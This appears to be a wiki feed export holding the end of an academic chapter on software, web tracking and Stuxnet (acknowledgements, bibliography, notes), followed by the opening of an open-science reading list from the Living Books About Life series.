There are many examples of how attending to the code and software that structure many of the life, memory and biopolitical systems and industries of contemporary society could yield similarly revealing insights, both into our usage of code and software and into the structuring assumptions, conditions and affordances that are generated. Our use of computational models is growing, and our tendency is to confuse the screenic representation visualised by code/software with what we might call the real – not to mention our failure to appreciate the ways in which code’s mediation is co-constructive of, and deeply involved in, the stabilisation of everyday life today. Even so, within institutional contexts, code/software has not been fully incorporated into the specific logics of these social systems, and in many ways undermines these structural and institutional forms. We must remain attentive to the fact that software engineering itself is a relatively recent discipline, and that its efforts at systematisation and rationalisation are piecemeal and incomplete, as the many hugely expensive software system failures attest. Of course, this code/software research is not easy: the techniques needed are still in their infancy, and whilst drawing on a wide range of scholarly work from the sciences, social sciences and the arts and humanities, we are still developing our understanding. But this should give hope and direction to critical theorists, both of the present, looking to provide critique and counterfactuals, and ''of'' the future, as code/software is a particularly rich site for intervention, contestation and the ''unbuilding'' of code/software systems.[16] &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== '''Acknowledgements'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; I am very grateful to the ''Forskningsrådet'' (Research Council of Norway) for the ''Yggdrasil'' fellowship ref: 211106 which funded my sabbatical in Oslo in 2012. I would also like to thank Anders Fagerjord, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo, for the kind invitation to be based at the university. An earlier version of this chapter was presented at UnlikeUs in March 2012, at the University of Amsterdam, and I would like to thank Geert Lovink for the kind invitation to present this work. I am also grateful to have had the opportunity to present versions of the chapter in this book to: PhiSci seminar series, organised by Rani Lill Anjum, CauSci (Causation in Science) and the UMB School of Economics and Business; ''Institutt for medier og kommunikasjon'' (IMK) seminar series, invited by Espen Ytreberg, University of Oslo; Digital Humanities Workshop, organized by Caroline Bassett, University of Sussex; the Media Innovations Colloquium organized by Tanja Storsul, ''Institutt for medier og kommunikasjon'' (IMK), University of Oslo; and the Archive in Motion workshop, ''Nasjonal Bibliotek'' organised by Ina Blom, University of Oslo. Many thanks are also due to Trine for proofing the documents included in this living book. &lt;br /&gt;
&lt;br /&gt;
== '''Bibliography'''  ==&lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
60 Minutes (2012a) Fmr. CIA head calls Stuxnet virus &amp;quot;good idea&amp;quot;, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57388982/fmr-cia-head-calls-stuxnet-virus-good-idea/ &lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; 60 Minutes (2012b) Stuxnet: Computer worm opens new era of warfare, ''60 Minutes'', accessed 04/03/2012, http://www.cbsnews.com/8301-18560_162-57390124/stuxnet-computer-worm-opens-new-era-of-warfare/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreams (n.d.) Activity Streams, accessed 04/03/2012, http://activitystrea.ms/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
ActivityStreamsWG (2011) JSON Activity Streams 1.0, Activity Streams Working Group, accessed 04/03/2012, http://activitystrea.ms/specs/json/1.0/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Associated Press (2012) Iran says Stuxnet virus infected 16,000 computers, ''Associated Press'', accessed 04/03/2012, http://www.foxnews.com/world/2012/02/18/iran-says-stuxnet-virus-infected-16000-computers/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Berry, D. M. (2011) ''The Philosophy of Software: Code and Mediation in the Digital Age'', London: Palgrave. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Baker, J. (2012) European Watchdog Pushes for Do Not Track Protocol, accessed 10/03/2012, http://www.pcworld.com/businesscenter/article/251373/european_watchdog_pushes_for_do_not_track_protocol.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
CBS News (2010) Iran Confirms Stuxnet Worm Halted Centrifuges, ''CBSNews'', accessed 04/03/2012, http://www.cbsnews.com/stories/2010/11/29/world/main7100197.shtml &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cherry, S. (2010) How Stuxnet Is Rewriting the Cyberterrorism Playbook, ''IEEE Spectrum: Inside Technology'', accessed 04/03/2012, http://spectrum.ieee.org/podcast/telecom/security/how-stuxnet-is-rewriting-the-cyberterrorism-playbook &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Cryptome (2010) Stuxnet Myrtus or MyRTUs?, accessed 04/03/2012, http://cryptome.org/0002/myrtus-v-myRTUs.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Deuze, M., Blank, P. and Speers, L. (2012) A Life Lived in Media, ''Digital Humanities Quarterly'', Winter 2012, Volume&amp;amp;nbsp;6&amp;amp;nbsp;Number&amp;amp;nbsp;1, accessed 29/02/2012, http://digitalhumanities.org/dhq/vol/6/1/000110/000110.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Dobias, J. (2010) Privacy Effects of Web Bugs Amplified by Web 2.0, in Fischer-Hübner, S., Duquenoy, P., Hansen, M., Leenes, R., and Zhang, G. (eds.) ''Privacy and Identity Management for Life'', London: Springer. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Economist (2012) Counting every moment, ''The Economist'', accessed 02/03/2012, http://www.economist.com/node/21548493 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
EFF (1999) The Web Bug FAQ, accessed 02/03/2012, http://w2.eff.org/Privacy/Marketing/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evans, S. (2012) Duqu Trojan used 'unknown' programming language: Kaspersky, CBR Software Malware, accessed 09/03/2012, http://malware.cbronline.com/news/duqu-trojan-used-unknown-programming-language-kaspersky-070312 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Evers, J. (2006) How HP bugged e-mail, accessed 02/03/2012, http://news.cnet.com/How-HP-bugged-e-mail/2100-1029_3-6121048.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Eyal, N. (2012) How To Manufacture Desire, ''TechCrunch'', accessed 05/03/2012, http://techcrunch.com/2012/03/04/how-to-manufacture-desire/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (1997) The Lifestreams Software Architecture, Ph.D. Dissertation, Yale University Department of Computer Science, May 1997, accessed 02/03/2012, http://www.cs.yale.edu/homes/freeman/dissertation/etf.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Freeman, E. T. (2000) Welcome to the Yale Lifestreams homepage!, accessed 02/03/2012, http://cs-www.cs.yale.edu/homes/freeman/lifestreams.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Fried, I. (2006) Dunn grilled by Congress, accessed 02/03/2012, http://news.cnet.com/Dunn-grilled-by-Congress/2100-1014_3-6120625.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Garber, M. (2012) Americans Love Google! Americans Hate Google!, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/03/americans-love-google-americans-hate-google/254253/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (1994) The Cyber-Road Not Taken, ''The Washington Post'', April 1994. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gelernter, D. (2010) Time To Start Taking The Internet Seriously, ''The Edge'', accessed 02/03/2012, http://www.edge.org/3rd_culture/gelernter10/gelernter10_index.html &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2010) The Many Data Hats a Company can Wear, accessed 02/03/2012, http://purplebox.ghostery.com/?p=948639073 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2011) Ghostrank Planetary System, accessed 02/03/2012, http://purplebox.ghostery.com/?p=1016021670 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012a) About Ghostery, accessed 02/03/2012, http://www.ghostery.com/about &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Ghostery (2012b) About ChartBeat, accessed 02/03/2012, http://www.ghostery.com/apps/chartbeat &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gostev, A. (2012) Stuxnet/Duqu: The Evolution of Drivers, SecureList, accessed 02/03/2012, https://www.securelist.com/en/analysis/204792208/Stuxnet_Duqu_The_Evolution_of_Drivers &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Gross, M. J. (2011) A Declaration of Cyber-War, ''Vanity Fair'', accessed 02/03/2012, http://www.vanityfair.com/culture/features/2011/04/stuxnet-201104 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Haraway, D. (2003) ''The Companion Species Manifesto: Dogs, People, and Significant Otherness'', Prickly Paradigm Press. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hayles, N. K. (2004) Print Is Flat, Code Is Deep: The Importance of Media-Specific Analysis, ''Poetics Today'', 25:1, pp 67-90. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Hopkins, N. (2011) 'New Stuxnet' worm targets companies in Europe, ''The Guardian'', http://www.guardian.co.uk/technology/2011/oct/19/stuxnet-worm-europe-duqu &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Kruszelnicki, K. (2011) Stuxnet opens cracks in Iran nuclear program, accessed 02/03/2012, http://www.abc.net.au/science/articles/2011/10/26/3348123.htm &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Langner, R. (2011) Ralph Langner: Cracking Stuxnet, a 21st-century cyberweapon, accessed 02/03/2012, http://www.youtube.com/watch?feature=player_embedded&amp;amp;amp;v=CS01Hmjv1pQ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Luma (2010) Display Advertising Technology Landscape, accessed 02/03/2012, http://www.lumapartners.com &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Madrigal, A. (2012) I'm Being Followed: How Google—and 104 Other Companies—Are Tracking Me on the Web, ''The Atlantic'', accessed 02/03/2012, http://m.theatlantic.com/technology/archive/2012/02/im-being-followed-how-google-and-104-other-companies-are-tracking-me-on-the-web/253758/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Markoff, J. and Sanger, D. E. (2010) In a Computer Worm, a Possible Biblical Clue, ''The New York Times'', accessed 04/03/2012, http://www.nytimes.com/2010/09/30/world/middleeast/30worm.html?_r=1 &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Matrosov, A., Rodionov, E., Harley, D. and Malcho, J. (n.d.) Stuxnet Under the Microscope, accessed 04/03/2012, http://go.eset.com/us/resources/white-papers/Stuxnet_Under_the_Microscope.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mitcham, C. (1998) The Importance of Philosophy to Engineering, ''Teorema'', Vol. XVII/3, pp. 27-47. &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mittal, S. (2010) User Privacy and the Evolution of Third-party Tracking Mechanisms on the World Wide Web, Thesis, accessed 04/03/2012, http://www.stanford.edu/~sonalm/Mittal_Thesis.pdf &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Mmpc2 (2010) The Stuxnet Sting, accessed 04/03/2012, http://blogs.technet.com/b/mmpc/archive/2010/07/16/the-stuxnet-sting.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Peterson, D. G. (2012) Langner’s Stuxnet Deep Dive S4 Video, accessed 04/03/2012, http://www.digitalbond.com/2012/01/31/langners-stuxnet-deep-dive-s4-video/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Pew (2012) Search Engine Use 2012, accessed 09/03/2012, http://pewinternet.org/Reports/2012/Search-Engine-Use-2012/Summary-of-findings.aspx &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Rieland, R. (2012) So What Do We Do With All This Data?, ''The Smithsonian'', accessed 04/03/2012, http://blogs.smithsonianmag.com/ideas/2012/01/so-what-do-we-do-with-all-this-data/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Sense (2012) Feel. Act. Make sense, accessed 04/03/2012, http://open.sen.se/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Tugend, A. (2012) Bad Habits? My Future Self Will Deal With That, accessed 04/03/2012, http://www.nytimes.com/2012/02/25/business/another-theory-on-why-bad-habits-are-hard-to-break-shortcuts.html?_r=3&amp;amp;amp;pagewanted=all &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
W3C (2012) Tracking Protection Working Group, accessed 14/03/2012, http://www.w3.org/2011/tracking-protection/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Wolfram, S. (2012) The Personal Analytics of My Life, accessed 09/03/2012, http://blog.stephenwolfram.com/2012/03/the-personal-analytics-of-my-life/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Yarrow, J. (2011) CHART OF THE DAY: Here's How Much A Unique Visitor Is Worth, ''Business Insider'', accessed 02/03/2012, http://www.businessinsider.com/chart-of-the-day-revenue-per-unique-visitor-2011-1 &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2010) Blockbuster Worm Aimed for Infrastructure, But No Proof Iran Nukes Were Target, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/09/stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp; &lt;br /&gt;
&lt;br /&gt;
Zetter, K. (2011) Report Strengthens Suspicions That Stuxnet Sabotaged Iran’s Nuclear Plant, ''Wired'', accessed 02/03/2012, http://www.wired.com/threatlevel/2010/12/isis-report-on-stuxnet/ &lt;br /&gt;
&lt;br /&gt;
&amp;amp;nbsp;&lt;br /&gt;
&lt;br /&gt;
== Notes  ==&lt;br /&gt;
&lt;br /&gt;
&amp;lt;br&amp;gt; &lt;br /&gt;
&lt;br /&gt;
[1] These include HTTP cookies, Locally Stored Objects (LSOs), and Document Object Model storage (DOM storage). &lt;br /&gt;
&lt;br /&gt;
[2] ‘Cookies are small pieces of text that servers can set and read from a client computer in order to register its “state.” They have strictly specified structures and can contain no more than 4 KB of data each. When a user navigates to a particular domain, the domain may call a script to set a cookie on the user’s machine. The browser will send this cookie in all subsequent communication between the client and the server until the cookie expires or is reset by the server’ (Mittal 2010: 10). &lt;br /&gt;
&lt;br /&gt;
[3] Ghostery describes itself on its help page: “Be a web detective. Ghostery is your window into the invisible web – tags, web bugs, pixels and beacons that are included on web pages in order to get an idea of your online behavior. Ghostery tracks the trackers and gives you a roll-call of the ad networks, behavioral data providers, web publishers, and other companies interested in your activity” (Ghostery 2012a). &lt;br /&gt;
&lt;br /&gt;
[4] For an example see, http://static.chartbeat.com/js/chartbeat.js &lt;br /&gt;
&lt;br /&gt;
[5] Also see examples at: (1) [http://static.chartbeat.com/js/chartbeat.js Chartbeat] &amp;amp;nbsp;; (2) [http://www.google-analytics.com/ga.js Google Analytics] &amp;amp;nbsp;; (3) [http://o.aolcdn.com/omniunih.js Omniture] &amp;amp;nbsp;; (4) [http://o.aolcdn.com/ads/adsWrapper.js Advertising.com] &lt;br /&gt;
&lt;br /&gt;
[6] A computer worm is technically similar in design to a virus and is therefore considered to be a sub-class of a virus. Indeed, worms spread from computer to computer, often across networks, but unlike a virus, a worm has the ability to transfer itself without requiring any human action. A worm is able to do this by taking advantage of the file or information transport features, such as the networking setup, on a computer, which it exploits to enable it to travel from computer to computer unaided. &lt;br /&gt;
&lt;br /&gt;
[7] One of the ways in which the Stuxnet attack target was identified was through a close reading of the computer code disassembled from the worm, together with careful analysis of the internal data structures and finite state machine used to structure the attack. Ironically, Ralph Langner then matched this against photographs that had been uploaded to the website of the President of Iran, Mahmoud Ahmadinejad, confirming the importance of the cascade structure, centrifuge layout and enrichment process through careful analysis of images accidentally captured in the background of photographs of computers used by the president; see [http://www.president.ir/en/9172 http://www.president.ir/en/9172] (Peterson, 2012). &lt;br /&gt;
&lt;br /&gt;
[8] The timestamp in the file ~wtr4141.tmp indicates that the date of compilation was 03/02/2010 (Matrosov et al., n.d.). There is, however, a suspicion that there may have been three versions of the Stuxnet code: 'Most curious, there were two major variants of the worm. The earliest versions of it, which appear to have been released in the summer of 2009, were extremely sophisticated in some ways but fairly primitive in others, compared with the newer version, which seems to have first circulated in March 2010. A third variant, containing minor improvements, appeared in April. In Schouwenberg’s view, this may mean that the authors thought Stuxnet wasn’t moving fast enough, or had not hit its target, so they created a more aggressive delivery mechanism. The authors, he thinks, weighed the risk of discovery against the risk of a mission failure and chose the former' (Gross, 2011). &lt;br /&gt;
&lt;br /&gt;
[9] There are some criticisms that this link may be spurious; for instance, Cryptome (2010) argues that it may be that the &amp;quot;myrtus&amp;quot; string from the recovered Stuxnet file path &amp;quot;b:\myrtus\src\objfre_w2k_x86\i386\guava.pdb&amp;quot; stands for &amp;quot;My-RTUs&amp;quot;, as in Remote Terminal Unit. &lt;br /&gt;
&lt;br /&gt;
[10] After having performed detailed analysis of the Duqu code, Kaspersky Labs stated that they 'are 100% confident that the Duqu Framework was not programmed with Visual C++. It is possible that its authors used an in-house framework to generate intermediary C code, or they used another completely different programming language' (Evans, 2012). &lt;br /&gt;
&lt;br /&gt;
[11] See http://quantifiedself.com/ &lt;br /&gt;
&lt;br /&gt;
[12] Wolfram further writes: 'It’s amazing how much it’s possible to figure out by analyzing the various kinds of data I’ve kept. And in fact, there are many additional kinds of data I haven’t even touched on in this post. I’ve also got years of curated medical test data (as well as my not-yet-very-useful complete genome), GPS location tracks, room-by-room motion sensor data, endless corporate records—and much much more…And as I think about it all, I suppose my greatest regret is that I did not start collecting more data earlier. I have some backups of my computer filesystems going back to 1980. And if I look at the 1.7 million files in my current filesystem, there’s a kind of archeology one can do, looking at files that haven’t been modified for a long time (the earliest is dated June 29, 1980)' (2012). &lt;br /&gt;
&lt;br /&gt;
[13] Some examples of visualization software for this kind of life-streaming quantification and visualization are shown on these pages from the Quantified Self website: http://quantifiedself.com/2011/03/personal-data-visualization/ , http://quantifiedself.com/2010/05/jaw-dropping-infographics-for/ , http://quantifiedself.com/2010/05/the-visualization-zoo/ , http://quantifiedself.com/2009/09/visualization-inspiration/ &lt;br /&gt;
&lt;br /&gt;
[14] See http://open.sen.se/ for a particularly good example of this: 'Make your data history meaningful. Privately store your flows of information and use rich visualizations and mashup tools to understand what's going on' (Sense, 2012). &lt;br /&gt;
&lt;br /&gt;
[15] ''Compactants'' is a contraction of computational actants, drawing the notion of actant from actor-network theory. I also like the association with companion actants, similar in idea to companion species. &lt;br /&gt;
&lt;br /&gt;
[16] Here I tentatively raise the suggestion that a future critical theory of code and software is committed to ''un-building'', ''dis-assembling'', and ''de-formation'' of existing code/software systems, together with a necessary intervention in terms of a positive moment in the formation and composition of future and alternative systems.&lt;/div&gt;</summary>
		<author><name>Garyhall</name></author>
	</entry>
	<entry>
		<id>https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4704</id>
		<title>Digitize Me, Visualize Me, Search Me</title>
		<link rel="alternate" type="text/html" href="https://livingbooksaboutlife.org/wiki/index.php?title=Digitize_Me,_Visualize_Me,_Search_Me&amp;diff=4704"/>
		<updated>2012-04-18T14:04:31Z</updated>

		<summary type="html">&lt;p&gt;Garyhall: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Image:LifetrackingCover1.jpg|right|318x450px|LifetrackingCover1.jpg]] Open Science and its Discontents &lt;br /&gt;
&lt;br /&gt;
[http://www.livingbooksaboutlife.org/books/ISBN_Numbers ISBN: 978-1-60785-267-4]&lt;br /&gt;
&lt;br /&gt;
''edited by'' [http://www.livingbooksaboutlife.org/books/Digitize_Me,_Visualize_Me,_Search_Me/bio Gary Hall] __TOC__ &lt;br /&gt;
&lt;br /&gt;
== [http://www.livingbooksaboutlife.org/books/Open_science/Introduction '''Introduction: White Noise: On the Limits of Openness (Living Book Mix)''']  ==&lt;br /&gt;
&lt;br /&gt;
One of the aims of the Living Books About Life series is to provide a 'bridge' or point of connection, translation, even interrogation and contestation, between the humanities and the sciences. Accordingly, this introduction to ''Digitize Me, Visualize Me, Search Me'' takes as its starting point the so-called ‘computational turn’ to data-intensive scholarship in the humanities. &lt;br /&gt;
&lt;br /&gt;
The phrase ‘[http://www.thecomputationalturn.com/ the computational turn]’ has been adopted to refer to the process whereby techniques and methodologies drawn from computer science and related fields – including science visualization, interactive information visualization, image processing, network analysis, statistical data analysis, and the management, manipulation and mining of data – are being increasingly used to produce new ways of approaching and understanding texts in the humanities - what is sometimes thought of as 'the digital humanities'. [http://www.livingbooksaboutlife.org/books/Open_science/Introduction (more...)] &lt;br /&gt;
&lt;br /&gt;
== Open Science  ==&lt;br /&gt;
&lt;br /&gt;
=== It’s An Open (Science), Open (Access), Open (Source), Open (Notebook) World  ===&lt;br /&gt;
&lt;br /&gt;
;[http://usefulchem.wikispaces.com/ Open Notebook Science ]&lt;br /&gt;
&lt;br /&gt;
;Patrick O. Brown, Michael B. Eisen, Harold Varmus&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0000036 Why PLoS Became a Publisher]&lt;br /&gt;
&lt;br /&gt;
;Sally Murray, Stephen Choi, John Hoey, Claire Kendall, James Maskalyk, and Anita Palepu&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC3091592/pdf/OpenMed-02-e1.pdf??tool=pmcentrez Open Science, Open Access and Open Source Software at ''Open Medicine'']&lt;br /&gt;
&lt;br /&gt;
=== Community Science  ===&lt;br /&gt;
&lt;br /&gt;
{{#widget:Vimeo|id=12873908}} &lt;br /&gt;
&lt;br /&gt;
;[http://www.psfk.com/2010/09/biocurious-a-community-lab-for-biotechnology.html BioCurious: A Community Lab for Biotechnology]&lt;br /&gt;
&lt;br /&gt;
;Richard Stallman&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0020047 Free Community Science and the Free Development of Science]&lt;br /&gt;
&lt;br /&gt;
=== 'This Revolution Will Be Digitized’: Online Tools for Open Science  ===&lt;br /&gt;
&lt;br /&gt;
;[http://biogang.openwetware.org/ Biogang]&lt;br /&gt;
&lt;br /&gt;
;Bill Hooker&amp;amp;nbsp; &lt;br /&gt;
:[http://3quarksdaily.blogs.com/3quarksdaily/2007/01/the_future_of_s.html The Future of Science is Open, Part 3: An Open Science World]&lt;br /&gt;
&lt;br /&gt;
;Chris Patil and Vivian Siegel&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2675795/ This Revolution Will Be Digitized: Online Tools for Radical Collaboration]&lt;br /&gt;
&lt;br /&gt;
=== Open Science Publishing  ===&lt;br /&gt;
&lt;br /&gt;
;Philip E. Bourne&amp;amp;nbsp; &lt;br /&gt;
:[http://www.ncbi.nlm.nih.gov/pmc/articles/PMC2877727/?tool=pmcentrez#pcbi.1000787-Hey1 What Do I Want from the Publisher of the Future?]&lt;br /&gt;
&lt;br /&gt;
;Cameron Neylon&amp;amp;nbsp; &lt;br /&gt;
:[http://pirsa.org/08090038/ Science in the Open/or/How I Learned to Stop Worrying and Love My Blog]&lt;br /&gt;
&lt;br /&gt;
== Open Knowledge  ==&lt;br /&gt;
&lt;br /&gt;
=== Access to Knowledge  ===&lt;br /&gt;
&lt;br /&gt;
;[http://okfn.org/ Open Knowledge Foundation]&lt;br /&gt;
&lt;br /&gt;
;Gaelle Krikorian and Amy Kapczynski, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://www.soros.org/initiatives/information/focus/access/articles_publications/publications/age-of-intellectual-property-20101110/age-of-intellectual-property-20101110.pdf ''Access to Knowledge In the Age of Intellectual Property'']&lt;br /&gt;
&lt;br /&gt;
=== New Models for Open Sharing and Open Research  ===&lt;br /&gt;
&lt;br /&gt;
;Anne H. Margulies&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosbiology.org/article/info%3Adoi%2F10.1371%2Fjournal.pbio.0020200 A New Model for Open Sharing]&lt;br /&gt;
&lt;br /&gt;
;Thomas B. Kepler, Marc A. Marti-Renom, Stephen M. Maurer, Arti K. Rai, Ginger Taylor, Matthew H. Todd&amp;amp;nbsp; &lt;br /&gt;
:[http://www.publish.csiro.au/nid/51/paper/CH06095.htm Open Source Research - The Power of Us]&lt;br /&gt;
&lt;br /&gt;
=== Open Knowledge and its Discontents  ===&lt;br /&gt;
&lt;br /&gt;
;J.J. King&amp;amp;nbsp; &lt;br /&gt;
:[http://www.metamute.org/proudtobeflesh The Packet Gang: Openness and its Discontents]&lt;br /&gt;
&lt;br /&gt;
;Michael Gurstein&amp;amp;nbsp; &lt;br /&gt;
:[http://gurstein.wordpress.com/2011/07/03/are-the-open-data-warriors-fighting-for-robin-hood-or-the-sheriff-some-reflections-on-okcon-2011-and-the-emerging-data-divide/ Are the Open Data Warriors Fighting for Robin Hood or the Sheriff?: Some Reflections on OKCon 2011 and the Emerging Data Divide]&lt;br /&gt;
&lt;br /&gt;
== Open Data  ==&lt;br /&gt;
&lt;br /&gt;
=== Data-Intensive Science  ===&lt;br /&gt;
&lt;br /&gt;
;Vincent S. Smith&amp;amp;nbsp; &lt;br /&gt;
:[http://www.biomedcentral.com/1756-0500/2/113 Data Publication: Towards a Database of Everything]&lt;br /&gt;
&lt;br /&gt;
;Tony Hey, Stewart Tansley, Kristen Tolle, eds&amp;amp;nbsp; &lt;br /&gt;
:[http://research.microsoft.com/en-us/collaboration/fourthparadigm/4th_paradigm_book_part4_complete.pdf Scholarly Communication, ''The Fourth Paradigm: Data-Intensive Scientific Discovery'']&lt;br /&gt;
&lt;br /&gt;
=== World of Data  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.freeourdata.org.uk/ Free Our Data]&lt;br /&gt;
&lt;br /&gt;
;Simon Rogers&amp;amp;nbsp; &lt;br /&gt;
:[http://www.guardian.co.uk/news/datablog/2010/nov/09/canada-open-data How Canada Became an Open Data and Data Journalism Powerhouse]&lt;br /&gt;
&lt;br /&gt;
=== We Can Know It For You  ===&lt;br /&gt;
&lt;br /&gt;
;Omer Tene&amp;amp;nbsp; &lt;br /&gt;
:[http://epubs.utah.edu/index.php/ulr/article/viewArticle/136 What Google Knows: Privacy and Internet Search Engines]&lt;br /&gt;
&lt;br /&gt;
;Daniel Chandramohan, Kenji Shibuya, Philip Setel, Sandy Cairncross, Alan D. Lopez, Christopher J. L. Murray, Basia Żaba, Robert W. Snow, Fred Binka&amp;amp;nbsp; &lt;br /&gt;
:[http://www.plosmedicine.org/article/info%3Adoi%2F10.1371%2Fjournal.pmed.0050057 Should Data from Demographic Surveillance Systems Be Made More Widely Available to Researchers?]&lt;br /&gt;
&lt;br /&gt;
== '''Digitize Me'''  ==&lt;br /&gt;
&lt;br /&gt;
=== Encode Me/Decode Me  ===&lt;br /&gt;
&lt;br /&gt;
;[http://www.ornl.gov/sci/techresources/Human_Genome/home.shtml Human Genome Project]&lt;br /&gt;
&lt;br /&gt;
;The ENCODE Project Consortium&amp;amp;nbsp; &lt;br /&gt;
:[http://pubmedcentralcanada.ca/picrender.cgi?accid=PMC3079585&amp;amp;blobtype=pdf&amp;amp;tool=pmcentrez A User's Guide to the Encyclopaedia of DNA Elements (ENCODE) ]&lt;br /&gt;
&lt;br /&gt;
;[http://www.decodeme.com/about-decodeme deCODEme]&lt;br /&gt;
